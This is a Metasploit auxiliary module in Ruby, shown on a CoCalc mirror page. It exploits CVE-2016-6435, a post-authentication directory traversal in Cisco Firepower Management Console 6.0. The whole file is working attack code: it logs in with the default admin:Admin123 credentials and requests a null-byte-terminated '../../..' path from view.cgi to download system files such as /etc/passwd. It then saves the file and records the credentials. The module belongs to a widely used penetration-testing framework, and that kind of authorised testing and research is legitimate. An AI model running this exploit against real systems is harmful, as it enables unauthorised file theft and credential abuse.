CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_firepower_download.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Scanner

8
  include Msf::Auxiliary::Report

9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",

14
      'Description'    => %q{

15
        This module exploits a directory traversal vulnerability in Cisco Firepower Management

16
        under the context of www user. Authentication is required to exploit this vulnerability.

17
      },

18
      'License'        => MSF_LICENSE,

19
      'Author'         =>

20
        [

21
          'Matt',   # Original discovery && PoC

22
          'sinn3r', # Metasploit module

23
        ],

24
      'References'     =>

25
        [

26
          ['CVE', '2016-6435'],

27
          ['URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking']

28
        ],

29
      'DisclosureDate' => '2016-10-10',

30
      'DefaultOptions' =>

31
        {

32
          'RPORT' => 443,

33
          'SSL'   => true,

34
          'SSLVersion' => 'Auto'

35
        }

36
    ))

37


38
    register_options(

39
      [

40
        # admin:Admin123 is the default credential for 6.0.1

41
        OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),

42
        OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),

43
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),

44
        OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd'])

45
      ])

46
  end

47


48
  def do_login(ip)

49
    console_user = datastore['USERNAME']

50
    console_pass = datastore['PASSWORD']

51
    uri          = normalize_uri(target_uri.path, 'login.cgi')

52


53
    print_status("Attempting to login in as #{console_user}:#{console_pass}")

54


55
    res = send_request_cgi({

56
      'method' => 'POST',

57
      'uri'    => uri,

58
      'vars_post' => {

59
        'username' => console_user,

60
        'password' => console_pass,

61
        'target'   => ''

62
      }

63
    })

64


65
    unless res

66
      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')

67
    end

68


69
    res_cookie = res.get_cookies

70
    if res.code == 302 && res_cookie.include?('CGISESSID')

71
      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first

72
      vprint_status("CGI Session ID: #{cgi_sid}")

73
      print_good("Authenticated as #{console_user}:#{console_pass}")

74
      report_cred(ip: ip, user: console_user, password: console_pass)

75
      return cgi_sid

76
    end

77


78
    nil

79
  end

80


81
  def report_cred(opts)

82
    service_data = {

83
      address: opts[:ip],

84
      port: rport,

85
      service_name: 'cisco',

86
      protocol: 'tcp',

87
      workspace_id: myworkspace_id

88
    }

89


90
    credential_data = {

91
      origin_type: :service,

92
      module_fullname: fullname,

93
      username: opts[:user],

94
      private_data: opts[:password],

95
      private_type: :password

96
    }.merge(service_data)

97


98
    login_data = {

99
      last_attempted_at: DateTime.now,

100
      core: create_credential(credential_data),

101
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

102
      proof: opts[:proof]

103
    }.merge(service_data)

104


105
    create_credential_login(login_data)

106
  end

107


108
  def download_file(cgi_sid, file)

109
    file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00"

110
    print_status("Requesting: #{file_path}")

111
    send_request_cgi({

112
      'method' => 'GET',

113
      'cookie' => "CGISESSID=#{cgi_sid}",

114
      'uri'    => normalize_uri(target_uri.path, 'events/reports/view.cgi'),

115
      'vars_get' => {

116
        'download' => '1',

117
        'files'    => file_path

118
      }

119
    })

120
  end

121


122
  def remote_file_exists?(res)

123
    (

124
      res.headers['Content-Disposition'] &&

125
      res.headers['Content-Disposition'].match(/attachment; filename=/) &&

126
      res.headers['Content-Type'] &&

127
      res.headers['Content-Type'] == 'application/octet-stream'

128
    )

129
  end

130


131
  def save_file(res, ip)

132
    fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH'])

133


134
    path = store_loot(

135
      'cisco.https',

136
      'application/octet-stream',

137
      ip,

138
      res.body,

139
      fname

140
      )

141


142
    print_good("File saved in: #{path}")

143
  end

144


145
  def run_host(ip)

146
    cgi_sid = do_login(ip)

147


148
    unless cgi_sid

149
      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')

150
    end

151


152
    res = download_file(cgi_sid, datastore['FILEPATH'])

153


154
    if res.nil?

155
      print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")

156
    elsif remote_file_exists?(res)

157
      save_file(res, ip)

158
    else

159
      print_error("Remote file not found: #{datastore['FILEPATH']}")

160
    end

161
  end

162
end

163


164